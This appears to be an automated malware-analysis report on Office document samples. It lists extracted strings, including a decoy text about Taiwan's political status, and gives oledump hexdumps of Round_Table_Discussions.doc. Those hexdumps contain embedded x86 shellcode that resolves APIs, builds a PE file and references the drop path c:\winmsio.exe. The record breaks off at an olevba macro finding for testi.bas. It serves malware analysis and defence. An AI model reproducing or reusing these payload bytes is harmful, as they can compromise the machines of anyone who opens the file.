%PwN
#r22k
MMMM
vJ,ll
dX>~~
uxD"bb
o_=}}
gd=H
W,...
reCCC
C)(p
j5k0m
YYYY30ZZ01YYYY
$%u#
upppp
9oooo9
GAu'gg7
dddd
!_GE09
QUGGGG
SGGGG
G--GA
))))
*|,Fn
jj:zz
f&&p
.x(~
fgggg
WW=(p.
?*_Q
	}YQ
/kOK
  T@
|v>KX
d@@@
eu"HF
i9yy
j	II
pppp
!C@@@(
E&ff
V$'''O
~FEEE
_+!I
79:::R
<8;;;S
Tvvv/
j3F&
^\#r
S\\\
Y\\\
]___
qttt
L:>V>]
\}}}$
~kddd=
7777g
z{{{
KJJJ
\("JV5uu
)(((@H+kk
JgFFF
_\".
E'&&&
B40X
U7ww
ViIII
)(]A
'ubbb
6Bfb
>Jnf
C\\\
V#/G
_J&w77
Y3;k
Fs;j**
g:.y
"#fvg2&
Z['=
eaaaa
%]CCC
;///
PE-|<<
Pnnn}
8DO04
z{>.?j~F[
2Fbn
2Fbn
&w77
#K7S
!p00i
))))
(444m
}$Ld
SF:k++
FPLLL
`1qq(
|-mm
+999`9f8
y}}}}
I*jj
;j**
]CBBB
^\]]]
|T6vv&
kqqq
7f&&
]]]]
I-mm=
n>V~
01   
AQ%0
0a!!x
7BEv
_hiii
w&ff
[3O+kk;
++++
8=U9]
y^GGG
_5?o
kkkk;
.666o6
(\xt"
N~|||
H]1a!!i!Uz2Fc+_D
xi!UR:
G]5!D
c##K
%222XX
_HHH""u'w
ZMMM
CNNN
iMIII
f7ww
	m--}
BW#r22k
w'gg
Z[[[
:/;k++
{n2c##z#
u`<m--t-
EEEE
<IAz
r7?>>>>CL
w6JG
&YQ^
6:$c%
0TJKK
7#]|
"& p
33l2
!Uqy
?Koc
d5uu,
;>>>>
J\\\\4`P
4&&&
+4444e
0444
cs5uu
xxxx!x
Hq/#W
V___
YTTT
[b<0DV
2 +++
gjjjjj
fwww
_]]]
:j**z
w*"r
R7ww$
-===d]`
g^%)v(s|
z2t44
{kkk
^;3d
'###
}?333
ALH ``
0%){;;
DD} 
6;;;;;`
MMMM
h9yy
26777
WBr#cc
{+***yJ
ldsrrr
{sdeeej
WWWW
y99i
3b""
PP:0Z\
!(((
zoc1qqJ
yxxx
no7h6R
:2%$$$$
-%2333Gw
I!!G
####
s~~~'
+_{k<
@LLL
#3s2|	
~ko=}}
%connnn
($$q
A?71DK
o>~~
BNOOOO
dg7]_57
r4$&&
....
Ii9n
$%%%%
+z::
|i}/oo
"(((qB
1111Y
LLu(8
XT )
[nddd=WV
vr"JL\\\4
'cGC)-}
|:zz
gnnn
0cfff
.&&&
b3ss
	DL&&
iquuuL
3Mx+
NMMMt)
Xabbb
HEEEEE
UQ9yy
RWWWW
# JJ  
fCS;{{{
?AFFF
*//G
c&6f
>dbbb
KKKK#
~8<l
V044
IEE/#
5y]Y
+gCK
4<<j=
dlM37
LHHH
okk=j
~8<|,
`ddd
\+#s
Hld2
y|||
hll:
 fn>
DGGG
olll
br#r
h}e4tt
h=5f0g
i,'&
88L]
qqqq!
I!9_
J^___
:;;;
Y>~~
I)ii>
ehT2rr
cvb3ss*
YlP6vv
N$4d
uk++
G/.///
7sW[?
&w77
#6:k++r
X	44$$$
onSSCCC0
1eAYR
'Cg{
?+\T&!
,}==
m=}}$
.~>>
3c##
eA)ii
HHHH
a$dd
~.nn7
EEEE-
m--EY9yy
}-mm
}==UU5uu
tai8xx
\y},ll
RR:::99QQQPP
?m--
7nnn
FFF@
ZZZp(((
FFF xxx
8```
,ttt
:bbb
DDDDDDD~$$$f<<<p***r(((B
b888
p***
f<<<
v,,,
p***
x"""$
k000,wwwS
"yyyO
*qqq7lll6mmm
^^^.uuu
XXX&}}}
>eee
`;;;
v---
f===
KBBB
JHHH
BFFF
PEEE
IZZZ
N^^^
ODDD
psss
+++++
f#ccccccCF
I		),
b{zzzz
x=}}]X
#q1111111111111111111111
nwuuuum>~~~~~~~~~~~~~~~~~~~~~~
~~8xxxxxxp6vvVS
m>~~~~~~~~~~~~~~~~~~~~~~
@@@@@@
AAad
=n......................
@@@@@@0v667777O	IIil
w1qqQT
]]]]]]]]]]]]]]
~((((xxxxxxxxxxxxxxx
DDDDDDDDDDDDDDD
#rrrrrrrrrrrrrrrr%%%
NOLMJKHIFGDEBC@A^_\]Z[XYVWTURSPQnolmjkhifgdebc`a~
|}z{xyvwturspq
./,-*+()&'$%"# !>?<=:;8967452301
NOLMJKHIFGDEBC@A^_\]Z[XiVWTURSPQnolmjkhifgdebc`a~
|}z{xsvwturspq
./,-*+()&'$%"# !>?<=:;8967452301
6? "8.:g#?!EBC@A^_\]Z[XYVWTURSPQnolmjkhifgdebc`a~
|}z{xyvwturspq
./,-*+()&'$%"# !>?<=:;8967452301
bjbj\
ScpOUL
/f&T
pp`vu 
]$Rzl 
v0WMO,
u;m(W
l	gnfM
O|vU\,
YUO 
O|vU\,
YUO 
NLu0beu-N 
g& )
ScpOUL
W,gKa
W,g?eV{ 
vuMR,
YUOwQ
UO.zKa
N|vU\,
YUO 
 as obligations imposed upon it shall be once again examined and reviewed or not ? 
What might be the best solution to the 
 Taiwan Issue 
US Federal Court of Appeals has ruled that Taiwan is still in a political purgatory, the stateless people on Taiwan have no national identity recognized by the international communities, and the people are living under the ruling by a government not universally acknowledged. 
US Federal Court of Appeals treats 
 Taiwan Issue 
 as a political question (doctrine)
etc.
What is your viewpoints on this situation ? 
In what way do you view the development of relations between USA and China ?
In what way do you view the development of relations between USA and Japan ?  
From the viewpoints of legal, political, economic and military aspects , what is the US fundamental attitude and policy toward 
 Taiwan Issue 
 in consideration of her global strategy (including the strategies dealing with Russia, India, North Korea and Iran) ? 
At present, 
~rirYri
h5yP
h5yP
h5yP
h5yP
h5yP
h5yP
h5yP
h5yP
h5yP
gd5yP
gd5yP
gd5yP
gd5yP
gd'h
h5yP
h5yP
how people on Taiwan should act efficiently and effectively, and what kind of attitude we should take to face 
 Taiwan Issue 
Mr. M. Richardson, do you have any idea or suggestions ?
Mr. M. Richardson, how do you feel about the development of Taiwan
s politics, economy, military and diplomatic measures taken during the past two years ?    
<hgQ
urn:schemas-microsoft-com:office:smarttags
place
urn:schemas-microsoft-com:office:smarttags
country-region
 " % & ' 2 t%
Round Table Discussions
AMD Sempron 2800+
Normal.dot
treu0813
Microsoft Office Word
Microsoft Office Word 
MSWordDoc
Word.Document.8
```  
  
</details>  

---
  
<details>  
<summary><b>Strings for dc79fe9c352907cecde56be7c335da60fa23044d547edf3f72128645e4184c98 (Notes.docx)</b> (Click to collapse.)</summary>  
  

---
  
Original strings result JSON can be found from [here.](results/json-output/strings/strings_dc79fe9c352907cecde56be7c335da60fa23044d547edf3f72128645e4184c98.json)  
```None
[Content_Types].xml 
l"%3
^i7+
%p)O
5}nH"
t4Q+
|T\y
_rels/.rels 
jH[{
l0/%
word/_rels/document.xml.rels 
}-;}PB
`[^^l
:>S!?p
(!O>z
word/document.xml
 @`I
$AXT
!}Y&
ypHg
E!duj
iYV*.y
Oeq7
[+g_
jC}\=
`L%R
Z}Sk
=e8Ro
4H@(
@Ob-I
*HfO
5!23
't+ 
bVoI
-s_H
00'd
mv_H
}.5~w
(Bx^
Jqa2
ruF8'
word/theme/theme1.xml
&%GyF
l`)Y
BVYT
qBz|
5(+66
BecA
u5V1
'2/s
rW@bs
p&`be
mK j
S9LU
D3o<
 QXn&
k%"k
*t&I
gp]^
Y_Lf
/W~_^WgDpM
*-oPr
2("N
word/settings.xml
TW:@
T`n[
HV/I
@}%[ZUC
F	^i
uR1`
BcvP
AVMH
!8;4#8
yq2T
h|Ka.
s\)xD
mY	o0
TDE%6
SLoav
hLBI
docProps/core.xml 
M|N"
!t+j
SJ1*
O/ p
7%Fwe
^]/oHq
word/fontTable.xml
{tDIN
4C>r
HKb,k 
Q[sk
Adyy
word/webSettings.xml
Bk"15i
I?`|
word/styles.xml
"[Y[n`~
X%"{<
~y>-
98Sy
"W1/
`kd\h
|gr^
'GV2Y$
/1_T62G3V
i,3,
Svl:
dPXuhV
bx[U
K)%'b
3<1p4
jK|p=&
dY/h
 	j)U
*%c6;
-3.>
`5dy
~faT
[[O86r
}#l{
^%oD
IW/Z
mX%:
G+8#
dTHA
bTHA
bTH	1*
vuy7
!*Lj8
!*Lj
!*Xj
g'0 [r
%W4?
z~B_
&5.[j
&5.[
PXX<7
d[5M
docProps/app.xml 
SiBnG
AElA
jeaM
&s8x
6h!=
GD->
[Content_Types].xmlPK
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/theme/theme1.xmlPK
word/settings.xmlPK
docProps/core.xmlPK
word/fontTable.xmlPK
word/webSettings.xmlPK
word/styles.xmlPK
docProps/app.xmlPK
```  
  
</details>  
  
## Oledump analysis data  
Oledump is a tool to analyze OLE files (also known as Compound File Binary) to find so called streams (virtual filesystems) from the sample file.  
This section attempts to provide analysis for streams if some were found from the samples.  
Analysis is mainly focusing on custom made hexdumper, which dumps base64 encoded string, and leaves out addresses with zeros.  

---
  
<details>  
<summary><b>Stream(s) found </b> for `Round_Table_Discussions.doc` (Click to collapse.)</summary>  
  

---
  
**SHA256:** `f2bba393701bc31bec7f4f1485c036ac07f96c1e4501ffd93cceb7300f78fe71`  
**Filename:** Round_Table_Discussions.doc  
  
#### Stream number 1  
**Stream name:** &#x27;\x01CompObj&#x27;  
```None
## Hexdump generated by oledumpResultGenerator extension
## NOTE that lines ONLY with zeros have been left out, with
exception that last line is always printed to see last offset address. 
## From base64 encoded string into hexdump

Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

000000 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 ................
000010 00 00 00 00 c0 00 00 00 00 00 00 46 14 00 00 00 ...........F....
000020 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 ce Microsoft Word .
000030 c4 b5 b5 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f ........MSWordDo
000040 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d c.....Word.Docum
000050 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 ent.8..9.q......
000060 00 00 00 00 00 00 ......

```  
  
#### Stream number 2  
**Stream name:** &#x27;\x05DocumentSummaryInformation&#x27;  
```None
## Hexdump generated by oledumpResultGenerator extension
## NOTE that lines ONLY with zeros have been left out, with
exception that last line is always printed to see last offset address. 
## From base64 encoded string into hexdump

Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

000000 fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 ................
000010 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 ................
000020 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ........+,..0...
000030 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 ............h...
000040 0f 00 00 00 70 00 00 00 05 00 00 00 88 00 00 00 ....p...........
000060 17 00 00 00 a0 00 00 00 0b 00 00 00 a8 00 00 00 ................
000070 10 00 00 00 b0 00 00 00 13 00 00 00 b8 00 00 00 ................
000080 16 00 00 00 c0 00 00 00 0d 00 00 00 c8 00 00 00 ................
000090 0c 00 00 00 d5 00 00 00 02 00 00 00 a8 03 00 00 ................
0000A0 1e 00 00 00 10 00 00 00 56 52 48 45 49 4b 45 52 ........VRHEIKER
0000D0 03 00 00 00 fc 0a 09 00 0b 00 00 00 00 00 00 00 ................
0000E0 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 ................
0000F0 0b 00 00 00 00 00 00 00 1e 10 00 00 01 00 00 00 ................
000100 01 00 00 00 00 0c 10 00 00 02 00 00 00 1e 00 00 ................
000110 00 05 00 00 00 cf ec c2 4f 00 03 00 00 00 01 00 ........O.......
000130 46 56 43 4c 8b f7 67 64 8b 3e 30 00 81 c7 00 08 FVCL..gd.>0.....
000140 00 00 8b c7 05 1f 00 00 00 b9 90 00 00 00 a5 e2 ................
000150 fd ff e0 e8 00 00 00 00 6a 0a eb 48 98 fe 8a 0e ........j..H....
000160 ac 08 da 76 7e d8 e2 73 ad 9b 7d df fb 97 fd 0f ...v~..s..}.....
000170 ea 49 8a e8 db 8a 23 e9 d4 d9 0e 67 e6 17 8f 7b .I....#....g...{
000180 54 ca af 91 63 3a 5c 77 69 6e 6d 73 69 6f 2e 65 T...c:\winmsio.e
0001A0 00 00 00 00 59 5f af 67 64 a1 30 00 8b 40 0c 8b ....Y_.gd.0..@..
0001B0 70 1c ad 8b 68 08 51 8b 75 3c 8b 74 2e 78 03 f5 p...h.Q.u<.t.x..
0001C0 56 8b 76 20 03 f5 33 c9 49 41 ad 03 c5 33 db 0f V.v ..3.IA...3..
0001D0 be 10 38 f2 74 08 c1 cb 0d 03 da 40 eb f1 3b 1f ..8.t......@..;.
0001E0 75 e7 5e 8b 5e 24 03 dd 66 8b 0c 4b 8b 5e 1c 03 u.^.^$..f..K.^..
0001F0 dd 8b 04 8b 03 c5 ab 59 e2 bc 83 ef 30 33 f6 bb .......Y....03..
000200 5e 7d 01 00 6a 04 68 00 10 00 00 53 56 ff d0 89 ^}..j.h....SV...
000210 47 fc 83 07 04 56 ff 37 ff 57 14 3d 5e c9 01 00 G....V.7.W.=^...
000220 75 f0 56 56 68 00 4c 00 00 ff 37 ff 57 0c 53 ff u.VVh.L...7.W.S.
000230 77 fc ff 37 ff 57 24 6a 02 8d 77 30 56 ff 57 1c w..7.W$j..w0V.W.
000240 89 07 8b 47 fc c6 80 4c 01 00 00 02 66 b9 4d 5a ...G...L....f.MZ
000250 66 89 08 03 40 3c 66 b9 50 45 66 89 08 53 ff 77 f...@<f.PEf..S.w
000260 fc ff 37 ff 57 20 ff 37 ff 57 18 e8 00 00 00 00 ..7.W .7.W......
000270 80 04 24 0d 6a 00 56 ff 77 28 ff 67 08 00 00 00 ..$.j.V.w(.g....
000FF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

```  
  
#### Stream number 3  
**Stream name:** &#x27;\x05SummaryInformation&#x27;  
```None
## Hexdump generated by oledumpResultGenerator extension
## NOTE that lines ONLY with zeros have been left out, with
exception that last line is always printed to see last offset address. 
## From base64 encoded string into hexdump

Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

000000 fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 ................
000010 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 ................
000020 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 .Oh.....+'..0...
000040 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 ................
000050 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 ................
000060 07 00 00 00 c4 00 00 00 08 00 00 00 d8 00 00 00 ................
000070 09 00 00 00 e8 00 00 00 12 00 00 00 f4 00 00 00 ................
000080 0a 00 00 00 10 01 00 00 0c 00 00 00 1c 01 00 00 ................
000090 0d 00 00 00 28 01 00 00 0e 00 00 00 34 01 00 00 ....(.......4...
0000A0 0f 00 00 00 3c 01 00 00 10 00 00 00 44 01 00 00 ....<.......D...
0000B0 13 00 00 00 4c 01 00 00 02 00 00 00 a8 03 00 00 ....L...........
0000C0 1e 00 00 00 01 00 00 00 00 00 73 00 1e 00 00 00 ..........s.....
0000D0 01 00 00 00 00 00 73 00 1e 00 00 00 07 00 00 00 ......s.........
0000E0 20 20 20 20 20 20 00 00 1e 00 00 00 01 00 00 00       ..........
0000F0 00 b4 b6 a8 1e 00 00 00 0b 00 00 00 4e 6f 72 6d ............Norm
000100 61 6c 2e 64 6f 74 00 00 1e 00 00 00 07 00 00 00 al.dot..........
000110 20 20 20 20 20 20 00 64 1e 00 00 00 02 00 00 00       .d........
000120 32 00 b6 a8 1e 00 00 00 13 00 00 00 4d 69 63 72 2...........Micr
000130 6f 73 6f 66 74 20 57 6f 72 64 20 31 31 2e 30 00 osoft Word 11.0.
000140 40 00 00 00 00 46 c3 23 00 00 00 00 40 00 00 00 @....F.#....@...
000150 00 ec 17 22 ad f9 c7 01 40 00 00 00 00 32 db 45 ..."....@....2.E
000160 ad f9 c7 01 03 00 00 00 01 00 00 00 03 00 00 00 ................
000FF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

```  
  
#### Stream number 4  
**Stream name:** &#x27;1Table&#x27;  
```None
## Hexdump generated by oledumpResultGenerator extension
## NOTE that lines ONLY with zeros have been left out, with
exception that last line is always printed to see last offset address. 
## From base64 encoded string into hexdump

Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

000000 14 00 0f 00 0a 00 01 00 69 00 0f 00 03 00 00 00 ........i.......
000010 03 00 00 00 00 00 46 00 00 40 f1 ff 02 00 46 00 ......F..@....F.
000020 0c 00 02 00 63 6b 87 65 00 00 0b 00 00 00 03 24 ....ck.e.......$
000030 03 31 24 00 61 24 03 00 24 00 43 4a 15 00 4b 48 .1$.a$..$.CJ..KH
000040 02 00 50 4a 03 00 5f 48 01 04 61 4a 18 00 6d 48 ..PJ.._H..aJ..mH
000050 09 04 6e 48 04 08 73 48 09 04 74 48 04 08 00 00 ..nH..sH..tH....
000070 1c 00 41 40 f2 ff a1 00 1c 00 0c 01 06 00 d8 9e ..A@............
000080 a4 8b b5 6b 3d 84 57 5b 53 4f 00 00 00 00 00 00 ...k=.W[SO......
0000A0 00 0e 00 00 00 00 ff ff ff ff 01 00 00 00 04 20 ............... 
0000B0 ff ff 01 00 22 26 a3 00 00 00 00 00 00 00 00 00 ...."&..........
0000E0 00 00 06 00 00 00 09 00 00 00 a9 00 00 00 00 30 ...............0
0000F0 00 00 00 00 00 00 00 80 00 00 00 80 a9 00 00 00 ................
000120 a9 00 00 00 00 30 00 00 00 00 00 00 00 80 00 00 .....0..........
000130 00 80 a9 00 00 00 00 30 00 00 00 00 00 00 00 80 .......0........
0001A0 00 00 09 00 00 00 07 00 ff ff 02 00 00 00 03 00 ................
0001B0 2a 67 9a 5b 49 4e 3b 00 00 00 00 00 00 00 00 00 *g.[IN;.........
000250 00 00 02 01 00 00 02 01 00 00 9e 01 00 00 02 01 ................
000260 00 00 02 01 00 00 96 01 00 00 ff 40 03 80 01 00 ...........@....
000270 06 00 00 00 06 00 00 00 68 f7 d0 00 01 00 00 00 ........h.......
000280 06 00 00 00 00 00 00 00 06 00 00 00 39 10 de 20 ............9.. 
0002A0 08 00 40 00 00 ff ff 01 00 00 00 07 00 55 00 6e ..@..........U.n
0002B0 00 6b 00 6e 00 6f 00 77 00 6e 00 ff ff 01 00 08 .k.n.o.w.n......
0002C0 00 00 00 00 00 00 00 00 00 00 00 ff ff 01 00 00 ................
0002D0 00 00 00 ff ff 00 00 02 00 ff ff 00 00 00 00 ff ................
0002E0 ff 00 00 02 00 ff ff 00 00 00 00 04 00 00 00 47 ...............G
000300 7a 00 20 00 00 00 80 08 00 00 00 00 00 00 00 ff z. .............
000310 01 00 00 00 00 00 00 54 00 69 00 6d 00 65 00 73 .......T.i.m.e.s
000320 00 20 00 4e 00 65 00 77 00 20 00 52 00 6f 00 6d . .N.e.w. .R.o.m
000330 00 61 00 6e 00 00 00 35 16 90 01 02 00 05 05 01 .a.n...5........
000360 00 79 00 6d 00 62 00 6f 00 6c 00 00 00 33 26 90 .y.m.b.o.l...3&.
000370 01 00 00 02 0b 06 04 02 02 02 02 02 04 87 7a 00 ..............z.
000380 20 00 00 00 80 08 00 00 00 00 00 00 00 ff 01 00  ...............
000390 00 00 00 00 00 41 00 72 00 69 00 61 00 6c 00 00 .....A.r.i.a.l..
0003A0 00 3b 06 90 01 86 03 02 01 06 00 03 01 01 01 01 .;..............
0003B0 01 03 00 00 00 00 00 0e 08 10 00 00 00 00 00 00 ................
0003C0 00 01 00 04 00 00 00 00 00 8b 5b 53 4f 00 00 53 ..........[SO..S
0003D0 00 69 00 6d 00 53 00 75 00 6e 00 00 00 20 00 04 .i.m.S.u.n... ..
0003E0 00 31 08 88 18 00 00 a4 01 00 00 68 01 00 00 00 .1.........h....
0003F0 00 22 93 b9 46 23 93 b9 46 00 00 00 00 02 00 01 ."..F#..F.......
000430 03 00 00 00 00 00 00 03 00 2d 00 13 00 21 00 29 .........-...!.)
000440 00 2c 00 2e 00 3a 00 3b 00 3f 00 5d 00 7d 00 a8 .,...:.;.?.].}..
000450 00 b7 00 c7 02 c9 02 15 20 16 20 19 20 1d 20 26 ........ . . . &
000460 20 36 22 01 30 02 30 03 30 05 30 09 30 0b 30 0d  6".0.0.0.0.0.0.
000470 30 0f 30 11 30 15 30 17 30 01 ff 02 ff 07 ff 09 0.0.0.0.0.......
000480 ff 0c ff 0e ff 1a ff 1b ff 1f ff 3d ff 40 ff 5c ...........=.@.\
000490 ff 5d ff 5e ff e0 ff 00 00 00 00 00 00 00 00 00 .].^............
000500 00 00 00 00 00 00 00 28 00 5b 00 7b 00 b7 00 18 .......(.[.{....
000510 20 1c 20 08 30 0a 30 0c 30 0e 30 10 30 14 30 16  . .0.0.0.0.0.0.
000520 30 08 ff 0e ff 3b ff 5b ff e1 ff e5 ff 00 00 00 0....;.[........
000560 00 00 00 00 00 00 00 00 00 00 00 00 00 08 07 a0 ................
000570 05 b4 00 9c 00 82 80 72 00 00 00 00 00 00 00 00 .......r........
0005D0 02 00 00 00 00 01 33 83 11 00 00 00 00 00 dc 03 ......3.........
0005F0 00 00 00 00 00 00 00 00 00 00 00 40 50 ff ff 12 ...........@P...
000610 00 2a 67 9a 5b 49 4e 04 00 2a 67 9a 5b 49 4e 00 .*g.[IN..*g.[IN.
000FF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

```  
  
#### Stream number 5  
**Stream name:** &#x27;WordDocument&#x27;  
```None
## Hexdump generated by oledumpResultGenerator extension
## NOTE that lines ONLY with zeros have been left out, with
exception that last line is always printed to see last offset address. 
## From base64 encoded string into hexdump

Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

000000 ec a5 c1 00 39 21 09 04 00 00 f0 52 bf 00 00 00 ....9!.....R....
000020 0e 00 62 6a 62 6a fd cf fd cf 00 00 00 00 00 00 ..bjbj..........
000040 32 0e 00 00 9f a5 00 00 9f a5 00 00 07 00 00 00 2...............
000060 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 ................
000070 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 ................
000080 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ................
000090 00 00 00 00 00 00 00 00 6c 00 00 00 00 00 96 00 ........l.......
0000D0 00 00 00 00 00 00 00 00 00 00 ca 00 00 00 00 00 ................
0000F0 00 00 68 01 00 00 00 00 00 00 68 01 00 00 0c 00 ..h.......h.....
000100 00 00 74 01 00 00 14 00 00 00 ca 00 00 00 00 00 ..t.............
000110 00 00 eb 02 00 00 f2 00 00 00 94 01 00 00 00 00 ................
000150 00 00 94 01 00 00 00 00 00 00 6a 02 00 00 02 00 ..........j.....
000160 00 00 6c 02 00 00 00 00 00 00 6c 02 00 00 00 00 ..l.......l.....
000170 00 00 6c 02 00 00 00 00 00 00 6c 02 00 00 00 00 ..l.......l.....
000180 00 00 6c 02 00 00 00 00 00 00 6c 02 00 00 24 00 ..l.......l...$.
000190 00 00 dd 03 00 00 20 02 00 00 fd 05 00 00 36 00 ...... .......6.
000200 00 00 a8 01 00 00 00 00 00 00 96 00 00 00 00 00 ................
000230 00 00 a5 02 00 00 16 00 00 00 a8 01 00 00 00 00 ................
000240 00 00 a8 01 00 00 00 00 00 00 a8 01 00 00 00 00 ................
000270 00 00 94 01 00 00 00 00 00 00 6a 02 00 00 00 00 ..........j.....
000280 00 00 00 00 00 00 00 00 00 00 a8 01 00 00 00 00 ................
0002C0 00 00 94 01 00 00 00 00 00 00 6a 02 00 00 00 00 ..........j.....
0002D0 00 00 a8 01 00 00 86 00 00 00 a8 01 00 00 00 00 ................
0002E0 00 00 00 00 00 00 00 00 00 00 2e 02 00 00 00 00 ................
000330 00 00 00 00 00 00 00 00 00 00 2e 02 00 00 00 00 ................
000340 00 00 94 01 00 00 00 00 00 00 88 01 00 00 0c 00 ................
000350 00 00 10 c9 ce 4b ad f9 c7 01 ca 00 00 00 9e 00 .....K..........
000360 00 00 68 01 00 00 00 00 00 00 94 01 00 00 0a 00 ..h.............
000370 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 ................
000380 00 00 2e 02 00 00 3c 00 00 00 bb 02 00 00 30 00 ......<.......0.
000390 00 00 eb 02 00 00 00 00 00 00 2e 02 00 00 00 00 ................
0003A0 00 00 33 06 00 00 00 00 00 00 9e 01 00 00 0a 00 ..3.............
0003B0 00 00 33 06 00 00 00 00 00 00 2e 02 00 00 00 00 ..3.............
0003C0 00 00 a8 01 00 00 00 00 00 00 aa 00 00 00 12 00 ................
0003D0 00 00 bc 00 00 00 0e 00 00 00 96 00 00 00 00 00 ................
0003F0 00 00 96 00 00 00 00 00 00 00 02 00 d9 00 00 00 ................
000400 07 07 07 07 07 07 0d 00 00 00 00 00 00 00 00 00 ................
000810 04 04 00 00 05 04 00 00 f9 00 00 00 00 00 00 00 ................
000820 00 00 00 00 00 f9 00 00 00 00 00 00 00 00 00 00 ................
000830 00 00 8c 0c 00 00 00 00 00 00 00 00 00 00 00 f9 ................
000840 00 00 00 00 00 00 00 00 00 00 00 00 f9 00 00 00 ................
000910 00 00 00 00 00 00 00 00 00 6c 00 00 eb 24 01 17 .........l...$..
000930 d6 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000940 00 00 33 c0 eb 3a 00 00 00 00 08 d6 30 00 00 00 ..3..:......0...
000950 00 00 00 00 00 00 00 00 00 00 00 00 00 8b 54 24 ..............T$
000960 0c 81 c2 9c 00 00 00 33 c0 b4 10 01 02 33 c0 c3 .......3.....3..
000970 00 00 00 00 00 00 00 00 00 00 00 00 00 13 d6 30 ...............0
000980 83 c7 41 57 64 ff 30 90 64 89 20 ba 32 43 31 3a ..AWd.0.d. .2C1:
000990 81 c2 14 13 12 12 bf 00 00 14 00 3b 17 74 03 47 ...........;.t.G
0009A0 eb f9 67 64 8f 06 00 00 83 c7 04 57 c3 00 00 00 ..gd.......W....
0009B0 14 f6 01 00 00 15 36 01 1a d6 08 00 00 00 ff 00 ......6.........
0009C0 00 00 ff 1b ff ff 00 00 00 ff 00 00 00 ff 1c d6 ................
0009D0 08 00 00 00 ff 00 00 00 ff 1d d6 08 00 00 00 ff ................
0009E0 00 00 00 ff 34 d6 06 00 01 0a 03 6c c4 33 00 30 ....4......l.3.0
000A00 00 04 00 00 07 04 00 00 fe 00 00 00 00 00 00 00 ................
000D20 00 01 00 00 00 6c 00 00 16 24 01 17 24 01 49 66 .....l...$..$.If
000D30 01 00 00 00 02 96 6c 00 03 34 01 05 d6 18 04 01 ......l..4......
000D50 00 00 04 01 00 00 08 d6 30 00 02 94 ff 39 10 de ........0....9..
000D60 20 00 06 a5 10 00 00 00 00 00 00 00 00 00 00 00  ...............
000D70 00 00 00 00 00 20 06 a5 10 00 00 00 00 00 00 00 ..... ..........
000D80 00 00 00 00 00 00 00 00 00 13 d6 30 00 00 00 ff ...........0....
000D90 04 01 00 00 00 00 00 ff 04 01 00 00 00 00 00 ff ................
000DA0 04 01 00 00 00 00 00 ff 04 01 00 00 00 00 00 ff ................
000DB0 04 01 00 00 00 00 00 ff 04 01 00 00 14 f6 01 00 ................
000DC0 00 15 36 01 1a d6 08 00 00 00 ff 00 00 00 ff 1b ..6.............
000DD0 d6 08 00 00 00 ff 00 00 00 ff 1c d6 08 00 00 00 ................
000DE0 ff 00 00 00 ff 1d d6 08 00 00 00 ff 00 00 00 ff ................
000DF0 34 d6 06 00 01 0a 03 6c 00 61 f6 03 00 00 00 02 4......l.a......
000E00 30 00 31 90 38 01 32 50 02 00 1f b0 82 2e 20 b0 0.1.8.2P...... .
000E10 c6 41 21 b0 08 07 22 b0 08 07 23 90 a0 05 24 90 .A!..."...#...$.
000E20 a0 05 25 b0 00 00 17 b0 53 03 18 b0 e0 03 0c 90 ..%.....S.......
000E30 a9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000FF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

```  
  
</details>  
  
## Olevba analysis data  
Olevba is a tool used for parsing OLE and OpenXML files such as MS office documents to detect VBA Macrocs and extract their source code. See more information about this tool in [here.](https://github.com/decalage2/oletools/wiki/olevba)  
This section attempts to provide results if some VBA macros have been found and to show their source codes.  
  
| SHA256 | Filename | Macros found |  
|:---:|:---:|:---:|  
| dc79fe9c352907cecde56be7c335da60fa23044d547edf3f72128645e4184c98 | Notes.docx | No |  
| a7fc11b5bcd8f0f4bd58d1b003202c2c92193adcf8f42fa30873cac92ba15cb9 | testi.bas | **Yes**, see advanced details. |  
| f2bba393701bc31bec7f4f1485c036ac07f96c1e4501ffd93cceb7300f78fe71 | Round_Table_Discussions.doc | No |  
| e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | tee.txt | No |  
  
  
### Olevba advanced analysis  

---
  
<details>  
<summary><b>No macros found</b> for `Notes.docx` (Click to collapse.)</summary>  
  

---
  
**SHA256:** `dc79fe9c352907cecde56be7c335da60fa23044d547edf3f72128645e4184c98`  
**Filename:** Notes.docx  
**Document type:** OpenXML  
  
For file Notes.docx: Olevba couldn&#x27;t detect any macros.  
  
</details>  

---
  
<details>  
<summary><b>Macros found</b> for `testi.bas` (Click to collapse.)</summary>  
  

---
  
**SHA256:** `a7fc11b5bcd8f0f4bd58d1b003202c2c92193adcf8f42fa30873cac92ba15cb9`  
**Filename:** testi.bas  
**Document type:** Text  
**Special keywords from document:**  
